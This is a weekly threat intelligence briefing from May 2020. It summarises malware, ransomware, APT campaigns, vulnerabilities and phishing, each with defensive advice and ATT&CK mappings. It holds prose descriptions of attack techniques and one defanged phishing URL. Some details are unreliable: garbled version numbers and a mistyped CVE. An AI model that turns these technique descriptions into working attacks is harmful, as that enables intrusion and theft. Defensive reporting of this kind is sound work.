The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: Android Malware, Bluetooth, Phishing, Winnti Group , WolfRAT, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
(published: May 24, 2020)
Recommendation: In order to identify whether or not a user's Discord client has been compromised by this latest version of AnarchyGrabber, they must view the "index.js" file. This can be found at "%AppData%\Discord\[version]\modules\discord_desktop_core\index.js file" and if the file does not have this single line in it, "module.exports = require('./core.asar');" then the client is likely to be infected. The best action to take once this has been identified is to uninstall the client completely and reinstalled it. You must also notify all individuals on your friends list as they have also potentially have been compromised by the Trojan.
MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] File Deletion - T1107 | [MITRE ATT&CK] User Execution - T1204 | [MITRE PRE-ATT&CK] Conduct social engineering - T1268 | [MITRE ATT&CK] Service Stop - T1489 | [MITRE ATT&CK] Steal Application Access Token - T1528
Tags: AnarchyGrabber3, Botnet, Discord, Password Stealer
(published: May 21, 2020)
The Ragnar Locker Ransomware has been seen in recent attacks deploying itself within a virtual machine on target systems in new methods to evade detection. The threat actors behind Ragnar Locker used a GPO task to execute a Microsoft installer to download an MSI package that contained an installation for VirtualBox and a virtual disk image for Windows XP. The software and image would be stored within the "C:\Program Files(x86)"VirtualApplicances" directory to appear as legitimate. The MSI installer will also install scripts that will disable Windows AutoPlay notifications and any shadow volumes existent. This same script will enumerate all local disk, mapped network drives, and removable drives so that they can be accessed by the virtual machine. The ransomware is executed with a batch file stored in the startup folder to provide persistence and once executed, the ransomware will encrypt files from all the available drives previously enumerated. The ransom note for each target will be unique since the ransomware is compiled solely for each user.
Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS). Always keep your important files backed up following the 3-2-1 rule: have at least 3 different copies, on 2 different mediums, with 1 off-site. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals.
MITRE ATT&CK: [MITRE ATT&CK] Process Discovery - T1057 | [MITRE ATT&CK] Registry Run Keys / Startup Folder - T1060 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Network Share Discovery - T1135 | [MITRE ATT&CK] Signed Binary Proxy Execution - T1218 | [MITRE PRE-ATT&CK] Install and configure hardware, network, and systems - T1336 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Inhibit System Recovery - T1490
Tags: Ragnar Locker, Ransomware, Virtual Machine, Windows XP
(published: May 21, 2020)
A new variant of the information stealing malware family "Raccoon" was discovered by Research Labs researchers masquerading as legitimate software. New samples seen will attempt to impersonate legitimate programs that include Bandicam and Revo Uninstaller. This latest version of this trojan is written in Borland Delphi and will target different browsers to collect sensitive data as well as perform screen capture and collect keystrokes of users. Raccoon will use a PowerShell script to disable Windows Defender and modify registry key values to disable the admin approval prompt for the payload to be executed.
Recommendation: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] PowerShell - T1086 | [MITRE ATT&CK] Disabling Security Tools - T1089 | [MITRE ATT&CK] Custom Command and Control Protocol - T1094 | [MITRE ATT&CK] Screen Capture - T1113 | [MITRE ATT&CK] Credentials from Web Browsers - T1503
Tags: Raccoon, Information Stealer, Screen Capture, Input Capture
(published: May 21, 2020)
Researchers at WeLiveSecurity have detected a new modular backdoor named "PipeMon," that is being used by the China-based Advanced Persistent Threat (APT) group called "Winnti Group." Winnti is using Pipepon to target video game companies in South Korea and Taiwan.
Recommendation: As this story portrays, it is important that your company institute policies regarding software in use and proper maintenance. New security updates should be applied as soon as possible because they often fix minor bugs and critical vulnerabilities that delay work-flow or can be exploited by malicious actors. Third-party software vendors must ensure that their software is secure frequently to avoid customers falling victim to cyber threats due to their own vulnerabilities. Digital certificates are a common platform for threat actors to conduct supply-chain attacks and third parties must have steps in place to ensure that certificates are only being used by authenticated and authorized individuals.
MITRE ATT&CK: [MITRE ATT&CK] Port Monitors - T1013 | [MITRE ATT&CK] Access Token Manipulation - T1134 | [MITRE ATT&CK] Bypass User Account Control - T1088 | [MITRE ATT&CK] Parent PID Spoofing - T1502 | [MITRE ATT&CK] Code Signing - T1116 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Process Discovery - T1057 | [MITRE ATT&CK] Security Software Discovery - T1063 | [MITRE ATT&CK] Screen Capture - T1113 | [MITRE ATT&CK] Commonly Used Port - T1043 | [MITRE ATT&CK] Standard Non-Application Layer Protocol - T1095 | [MITRE ATT&CK] Standard Cryptographic Protocol - T1032 | [MITRE ATT&CK] Fallback Channels - T1008
Tags: Winnti Group, PipeMon, Backdoor, South Korea, Taiwan
(published: May 20, 2020)
Proofpoint researchers have identified new versions of ZLoader, a variant of the Zeus banking trojan being active since December 2019. Targeted countries have included Australia, Canada, Germany, Poland, and the U.S.A. Email lures being used for Zloader have incorporated COVID-19 prevention and testing scams as well as fake invoices. Since December 2019 and up until the time of reporting, there have been 25 versions of ZLoader identified with version 184.108.40.206 being the most recent. The trojan contains multiple mechanisms in place to evade detection as well as making it hard to reverse engineer. The malware will attempt to steal user credentials from a web browser and will use HTTP POST requests to communicate with the Command and Control (C2). The abilities of Zloader also include stealing cookies from browsers, deleting itself, and blocking user access to certain URLs. It was noted that in version 220.127.116.11 onwards, ZLoader would employ a Domain Generation Algorithm (DGA) in the situation where the malware could not initially communicate to the C2.
Recommendation: All employees should be educated on the risks of phishing, specifically, how to identify such attempts using recent and ongoing events like the COVID-19 pandemic, and whom to contact if a phishing attack is identified. Emails that request that the recipient follow a link that then asks for credentials to be entered is often an indicator of a phishing attack.
MITRE ATT&CK: [MITRE ATT&CK] Custom Command and Control Protocol - T1094 | [MITRE ATT&CK] File Deletion - T1107 | [MITRE ATT&CK] Spearphishing Link - T1192 | [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Credentials from Web Browsers - T1503 | [MITRE ATT&CK] Steal Web Session Cookie - T1539
Tags: ZLoader, Banking Trojan, Spearphishing
(published: May 20, 2020)
Out-of-Band security updates have been made available for Adobe products that include Character Animator, Premier Pro, Audition, and Premiere Rush. The vulnerability for Adobe Character Animator was registered as "CVE-2020-9586," a critical buffer overflow vulnerability which could provide threat actors the ability to execute remote code on a target system. The vulnerabilities for Premiere Pro, Audition and Premiere are classified as Out-Of-Bounds vulnerabilities that would cause information disclosure of sensitive information for threat actors to gain access.
Recommendation: It is important that your company has patch-maintenance policies in place, particularly when there are Bring Your Own Device (BYOD) policies in use. Once vulnerabilities have been reported on in open sources, threat actors will likely attempt to incorporate the exploitation of the vulnerability into their malicious operations. Patches should be reviewed and applied as soon as possible to prevent potential malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203
Tags: Adobe, Remote Code Execution, Information Disclosure, CVE-2020-9586, CVE-2020-9616, CVE-2020-9617, CVE-2020-9618
(published: May 19, 2020)
The Advanced Persistent Threat (APT) group "Greenbug" has been seen targeting telecommunication companies in South Asia as recent as April 2020, and are using spearphishing campaigns to provide the first point of entry. The group uses off-the-shelf tools and open source techniques as part of its espionage operations focused on gaining access to database servers and stealing credentials for later access. The group is potentially linked to Iran as well as connections to the Shamoon Group who have been conducting wiping operations against organizations in Saudi Arabia. Evidence was shown to find Greenbug being present on systems prior to the Shamoon Group wiping them. This raises the likelihood of collaboration between the two groups in which Greenbug provides the Shamoon Group credentials for target systems to wipe.
Recommendation: Databases should not be directly accessible over, or connected to the internet. Protect these services with authentication, do not allow guest or anonymous login. For web applications that are accessing database data, make sure all user-supplied data is sanitized to prevent SQL injections. Even if the activity of Greenbug and the Shamoon Group is not linked, individuals must update database credentials annually and keep remote copies as backups in the case of being compromised.
MITRE ATT&CK: [MITRE ATT&CK] PowerShell - T1086 | [MITRE ATT&CK] System Network Configuration Discovery - T1016 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] User Execution - T1204 | [MITRE PRE-ATT&CK] Upload, install, and configure software/tools - T1362
Tags: Greenbug, Telecommunication, Open-Source, Credential Access
(published: May 19, 2020)
A modified version of the Android Remote Access Tool (RAT) DenDroid called "WolfRAT" has been targeting Android users in Thailand, as discovered by researchers at Cisco Talos. The modified RAT will target messaging applications including Facebook Messenger, Line, and WhatsApp with Cisco Researchers linking it to DenDroid due to strong overlaps in the Command and Control (C2) infrastructure used. The RAT is linked to a German based startup called "Wolf Research", who are known for selling malware and spyware to governments around the world. WolfRAT will attempt to masquerade as a Flash update, GooglePlay or as a Google service to collect sensitive information from Android users. The malware is unsophisticated with much of the code being copied and pasted from open sources. Once Wolf Research was reported on, the company closed down but soon resurfaced in Cyprus under the name "LokD".
Recommendation: It is important to only use the Google Play Store to obtain your software (for Android users), and avoid installing software from unverified sources because it is easier for malicious applications to get into third-party stores. Applications that ask for additional permissions outside of their normal functionality should be treated with suspicion, and normal functionality for the applications should be reviewed carefully prior to installation. Antivirus applications, if available, should be deployed on devices, particularly those that could contain sensitive information.
Tags: Android, Spyware, WolfRAT, Thailand
(published: May 19, 2020)
The threat group CIRCUS SPIDER are moving away from their usage of phishing campaigns to distribute payloads for its NetWalker ransomware, and are now relying on network intrusion of specific large businesses only. On April 19, 2020, the group was seen making job advertisements on a Russian hacking forum looking for individuals with experience in network intrusion to join the group. In the advertisement, the group specified that the potential affiliate must always restore user files once a ransom has been paid and that targeting should not include Russia or the Commonwealth of Independent States (CIS).
Recommendation: With ransomware, individuals must always run antivirus and endpoint protection software to assist in preventing ransomware infection. Maintain secure backups of all your important files to avoid the need to consider payment for the decryption key, and implement a business continuity plan in the unfortunate case of ransomware infection. In the case of ransomware infection, the affected systems should be wiped and reformatted, even if the ransom is paid. Other machines on the same network should be scanned for other potential infections.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: NetWalker, Ransomware, RaaS, Enterprise
(published: May 19, 2020)
The British airline EasyJet has released information detailing the email addresses and travel details of an estimated nine million customers that have been accessed by unauthorized individuals. The credit card data of 2,208 customers was also accessed during this compromise. EasyJet became alerted to this malicious activity back in January 2020 but only started to inform customers about this breach in late April.
Recommendation: Leaks of this sort may cause affected individuals to be at a greater risk of phishing attacks. Actors can use this information to craft custom emails to increase their chances of malicious activity being approved by the recipient. Individuals who have accounts associated with this incident should change their passwords as soon as possible, particularly if passwords for said accounts are the same to other online accounts. Individuals should also regularly monitor their credit reports for suspicious activity or consider an identity theft protection service.
MITRE ATT&CK: [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] User Execution - T1204
Tags: EasyJet, Data Breach, PII
(published: May 18, 2020)
A vulnerability has been found in the Bluetooth wireless protocol which allows for threat actors to take control of Bluetooth enabled devices. The vulnerability is registered as "CVE-2020-10135" aka Bluetooth Impersonation AttackS (BIAS), which affects all modern devices capable of Bluetooth pairing including IoT devices, laptops, smartphones, and tablets. The vulnerability relates to how devices are initially paired with Bluetooth using a link key. Improper authentication of the post-bonding process of devices allows for threat actors to masquerade as the genuine device and gain access to them using the link key. The Bluetooth chips used by Apple, CSR, Cypress, Intel, Samsung, and Qualcomm are all vulnerable to BIAS attacks unless patched.
Recommendation: Since the reporting of CVE-2020-0135, the Bluetooth standards organisation, Bluetooth Special Interest Group (SIG) have released updates to prevent BIAS attacks from occurring. All devices should be kept up-to-date with the latest software versions to use the newest security features implemented in the update. Additionally, only trusted devices should be connected to via Bluetooth, and Bluetooth should be turned off when not in use.
MITRE ATT&CK: [MITRE ATT&CK] Peripheral Device Discovery - T1120
Tags: Bluetooth, CVE-2020-10135, Apple, Intel, Samsung
(published: May 18, 2020)
Researchers from Cisco Talos have identified two remote code execution vulnerabilities in the Nitro Pro PDF reader registered as "CVE-2020-6074" and "CVE-2020-6092". The first vulnerability allows threat actors to exploit the parser used for reading PDFs by crafting PDF documents causing integer overflow, which enables threat actors to execute arbitrary code. The second vulnerability relates to how the 18.104.22.168 version of Nitro Pro handles XML errors. Specially crafted PDF documents will cause uninitialized memory access resulting in information disclosure. The vulnerabilities can only be exploited once a user has opened these documents which have likely been distributed via spearphishing campaigns.
Recommendation: With these vulnerabilities likely to be exploited through spearphishing, individuals should be educated on the risks of it, specifically, how to identify such attempts and whom to contact if a phishing email is identified. Emails that request that the recipient follow a link or open an attachment can often be indicative of a spearphishing attack. Once vulnerabilities have been reported on in open sources like this, threat actors will likely attempt to incorporate the exploitation of the vulnerability into their malicious operations. Patches should be reviewed and applied as soon as possible to prevent potential malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] User Execution - T1204
Tags: Nitro Pro PDF Reader, CVE-2020-6074, CVE-2020-6092, Remote Code Execution
(published: May 18, 2020)
Spearphishing tactics involving threat actors taking advantage of the OAuth2 framework and OpenID Connect (OIDC) protocol to access data has been discovered by researchers at Cofense. Emails have been seen masquerading as bonuses for the work quarter and will ask users to visit a SharePoint hosted file which will take them to what appears to be a legitimate Microsoft Office 365 login page. OAuth2 and OIDC are used by Microsoft to provide users access tokens to access Office 365 data. OIDC is used to authenticate users and then will use OAuth2 to authorize Office 365 data access to them. The URL is modified by threat actors so that responses given and the associated tokens and authentication codes of users will be redirected to a different website named hxxps://officehnoc[.]com/office which masquerades as a legitimate Office 365 page. The URL will include a scope parameter to allow threat actors to access email accounts when users are offline, read their contact list, and read emails.
Recommendation: Spearphishing emails represent a significant security risk because the sending email will often appear legitimate to the target; sometimes a target company email is compromised and used for such emails. Education is the best defense, inform your employees on what to expect for information requests from their managers and colleagues. Employees should also be aware of whom to contact when they suspect they are the target of a possible spearphishing attack.
MITRE ATT&CK: [MITRE ATT&CK] Email Collection - T1114 | [MITRE ATT&CK] Spearphishing Link - T1192 | [MITRE ATT&CK] User Execution - T1204 | [MITRE PRE-ATT&CK] Conduct social engineering - T1268
Tags: Microsoft Office 365, MFA Bypass, OAuth2, OIDC